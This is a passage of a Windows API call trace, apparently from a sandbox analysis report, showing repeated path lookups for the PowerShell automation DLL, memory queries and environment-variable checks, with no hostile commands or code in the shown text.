lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.202] GetLastError () returned 0xcb [0090.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.202] GetLastError () returned 0xcb [0090.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.202] GetLastError () returned 0xcb [0090.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.202] GetLastError () returned 0xcb [0090.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.202] GetLastError () returned 0xcb [0090.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.202] GetLastError () returned 0xcb [0090.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.202] GetLastError () returned 0xcb [0090.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.202] GetLastError () returned 0xcb [0090.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.202] GetLastError () returned 0xcb [0090.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.202] GetLastError () returned 0xcb [0090.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.203] GetLastError () returned 0xcb [0090.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d804, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.204] GetLastError () returned 0xcb [0090.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d804, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.204] GetLastError () returned 0xcb [0090.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d804, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.204] GetLastError () returned 0xcb [0090.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.208] GetLastError () returned 0xcb [0090.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d804, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.208] GetLastError () returned 0xcb [0090.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d804, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.208] GetLastError () returned 0xcb [0090.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.208] GetLastError () returned 0xcb [0090.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d804, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.208] GetLastError () returned 0xcb [0090.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d804, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.208] GetLastError () returned 0xcb [0090.208] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.208] GetLastError () returned 0xcb [0090.211] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.219] GetLastError () returned 0xcb [0090.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.220] GetLastError () returned 0xcb [0090.221] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.221] GetLastError () returned 0xcb [0090.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.224] GetLastError () returned 0xcb [0090.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.227] GetLastError () returned 0xcb [0090.236] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.236] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.267] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.269] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0090.269] GetLastError () returned 0xcb [0090.394] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x385960 [0090.394] GetLastError () returned 0x0 [0090.394] GetLastError () returned 0x0 [0090.447] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.454] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.455] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.455] VirtualQuery (in: lpAddress=0x13c434, lpBuffer=0x13d434, dwLength=0x1c | out: lpBuffer=0x13d434*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.470] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.470] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.470] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.470] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.471] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.472] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.472] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.472] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.472] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.472] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.472] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.472] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.472] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.472] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.472] VirtualQuery (in: lpAddress=0x13cd80, lpBuffer=0x13dd80, dwLength=0x1c | out: lpBuffer=0x13dd80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13db7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.477] GetLastError () returned 0xcb [0090.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13db2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.477] GetLastError () returned 0xcb [0090.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13db2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.477] GetLastError () returned 0xcb [0090.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13db2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.477] GetLastError () returned 0xcb [0090.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13db7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.487] GetLastError () returned 0xcb [0090.487] GetFullPathNameW (in: 